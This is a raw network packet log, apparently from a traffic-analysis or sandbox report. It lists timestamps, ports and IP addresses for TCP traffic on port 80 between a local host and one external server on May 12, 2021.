May 12, 2021 18:42:56.835741997 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.835747957 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.835781097 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.835792065 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.835829020 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.835836887 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.835869074 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.835899115 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.835916042 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.835926056 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.835961103 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.835973978 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.835999012 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836009979 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836035967 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836044073 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836071014 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836081982 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836113930 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836116076 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836152077 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836167097 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836194038 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836201906 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836232901 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836245060 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836273909 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836287975 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836312056 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836323023 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836358070 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836369991 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836394072 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836404085 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836426020 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836456060 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836466074 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836503983 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836518049 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836540937 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836555958 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836580038 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836595058 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836620092 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836632013 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836654902 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836678028 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836698055 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836702108 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836730957 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836749077 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836776972 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.836790085 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.836899996 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.839076042 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.839936018 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.841608047 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.841660023 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:56.841708899 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:56.842704058 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.022789001 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.022846937 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.022883892 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.022919893 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.022957087 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.023129940 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.023145914 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.023222923 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.023332119 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.023411036 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.023502111 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.023514032 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.023549080 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.023570061 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.023585081 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.023591995 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.023613930 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.023617983 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.023634911 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.023658991 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.023659945 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.023680925 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.023685932 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.023710012 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.023711920 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.023731947 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.023740053 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.023753881 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.023775101 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.023776054 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.023797989 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.023801088 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.023821115 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.023832083 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.023847103 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.023863077 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.023890018 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.024293900 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.024319887 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.024401903 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.025377035 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.026527882 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.026559114 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.026582003 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.026623964 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.026659966 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.026684999 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.026698112 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.026709080 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.026734114 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.026752949 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.026758909 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.026781082 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.026803970 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.026812077 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.026828051 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.026854992 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.026873112 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.026880026 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.026904106 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.026926994 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.026935101 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.026951075 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.026964903 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.026973963 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.026995897 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027004004 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027019024 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027038097 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027044058 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027069092 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027075052 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027091980 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027108908 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027116060 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027137041 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027139902 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027158022 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027168989 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027184010 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027201891 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027208090 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027230978 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027234077 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027257919 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027261972 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027281046 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027287960 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027303934 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027316093 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027328014 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027347088 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027350903 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027374029 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027376890 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027395964 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027404070 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027421951 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027440071 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027447939 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027470112 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027472019 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027503967 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027524948 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027539968 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027555943 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027564049 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027590036 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027590990 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027612925 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027625084 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027637959 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027646065 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027661085 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027677059 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027686119 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027705908 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027713060 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027736902 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027738094 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027760983 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027769089 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027784109 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027806044 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027810097 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027827978 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027851105 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027862072 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027873039 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027879000 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027899981 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027913094 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027925014 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027947903 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027949095 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027970076 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.027977943 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.027995110 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.028007030 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.028019905 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.028038979 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.028079033 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.028630972 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.028657913 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.028703928 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.028723955 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.029375076 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.029443026 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.029475927 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.029496908 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.029503107 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.029516935 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.029526949 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.029550076 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.029553890 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.029573917 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.029583931 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.029597044 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.029618025 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.029655933 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.031191111 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.031223059 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.031289101 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.032605886 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.032623053 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.035054922 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.213423014 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.213491917 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.213522911 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.213563919 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.213610888 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.213659048 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.213664055 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.213685036 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.213712931 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.213722944 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.213766098 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.213778973 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.213820934 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.213824987 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.213901043 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.213937044 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.213952065 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.213968992 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.214018106 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.214031935 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.214081049 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.214088917 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.214138985 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.214148045 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.214200020 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.214207888 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.214258909 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.214263916 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.214319944 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.214324951 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.214375973 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.214385033 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.214433908 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.214452982 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.214504957 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.214514017 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.214565039 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.214574099 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.214628935 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.214636087 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.214694977 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.214700937 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.214751005 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.214762926 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.214797974 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.214801073 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.214849949 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.214853048 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.214901924 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.214936972 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.214998960 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.215048075 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.215078115 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.215109110 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.215122938 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.215162992 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.215167999 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.215215921 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.215235949 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.215285063 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.215296030 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.215342999 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.215354919 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.215403080 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.215410948 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.215456009 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.215464115 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.215517044 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.215522051 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.215579033 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.215617895 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.215629101 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.215631008 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.215676069 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.215689898 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.215747118 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.215749979 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.215802908 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.215806961 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.215852022 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.215856075 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.215903044 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.215912104 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.215956926 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.215986967 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.216039896 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.216051102 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.216109991 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.216123104 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.216156006 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.216161013 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.216217041 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.216255903 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.216265917 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.216275930 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.216331959 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.217555046 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.217601061 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.217653036 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.217659950 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.217668056 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.217710018 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.217719078 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.217766047 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.220115900 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.220185041 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.225056887 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.225106001 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.225161076 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.225183964 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.225203991 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.225207090 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.225213051 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.225259066 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.225269079 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.225311041 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.225333929 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.225378036 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.225430012 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.225476980 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.225495100 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.225538969 CEST	49167	80	192.168.2.22	198.54.114.131
